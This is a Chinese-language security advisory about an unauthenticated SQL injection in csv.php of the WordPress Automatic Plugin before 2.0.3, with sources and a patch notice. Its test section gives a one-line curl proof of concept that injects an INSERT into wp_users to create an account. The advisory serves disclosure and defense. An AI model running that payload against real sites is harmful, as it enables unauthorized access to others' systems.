发布日期:2012-06-18
更新日期:2012-06-19受影响系统:
WordPress Automatic Plugin 2.x
描述:
--------------------------------------------------------------------------------
WordPress是一种使用PHP语言和MySQL数据库开发的Blog(博客、网志)引擎,用户可以在支持PHP和MySQL数据库的服务器上建立自己的Blog。Wordpress Automatic Plugin for WordPress 2.0.3之前版本没有验证通过"q"参数传递到csv.php的输入即用作SQL查询,csv.php文件没有要求有效的登录凭证,通过注入任意SQL代码可操作SQL查询,执行SQL注入攻击。<*来源:exploit-db
链接:http://www.exploit-db.com/exploits/19187/
http://secunia.com/advisories/49573/
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!$ curl --data q=INSERT INTO `wp_users` (`user_login`, `user_pass`, `user_email`) VALUES ("test", "123456", "jblow@gmail.com") http://www.example.com/blog/wp-content/plugins/wp-automatic/inc/csv.php建议:
--------------------------------------------------------------------------------
厂商补丁:WordPress
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://wordpress.org/Symantec LiveUpdate Administrator不安全文件权限漏洞IBM WebSphere Application Server iehs跨站脚本执行漏洞相关资讯 WordPress WordPress漏洞 SQL注入漏洞
- Wordpress Admin API拒绝服务漏洞( (今 16:14)
- WordPress column_title跨站脚本漏 (06月30日)
- WordPress 访问限制绕过漏洞(CVE- (06月30日)
| - WordPress wp_get_attachment_link (06月30日)
- WordPress customizer重定向限制绕 (06月30日)
- WordPress password-change安全限 (06月30日)
|
本文评论 查看全部评论 (0)
易网时代-编程资源站